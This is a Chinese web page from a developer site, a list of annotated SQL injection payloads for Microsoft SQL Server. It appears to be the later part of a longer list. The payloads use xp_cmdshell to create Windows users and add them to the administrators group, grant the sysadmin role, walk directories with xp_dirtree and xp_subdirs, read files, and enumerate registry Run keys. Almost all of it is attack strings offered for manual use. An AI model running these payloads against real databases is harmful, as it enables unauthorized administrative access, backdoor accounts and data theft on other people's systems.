WEB开发网
开发学院网络安全黑客技术 带注释手动注入脚本命令总结 阅读

带注释手动注入脚本命令总结

 2007-04-24 16:43:25 来源:WEB开发网   
核心提示: ;exec master.dbo.sp_addsrvrolemember sysadmin username;--;exec master.dbo.xp_cmdshell ’net user username password/workstations:*/times:all/

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell ’net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ’c:’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs ’c:’;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:’;-- 获得所有子目录的目录树构

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:webindex.asp’;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

Tags:注释 手动 注入

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接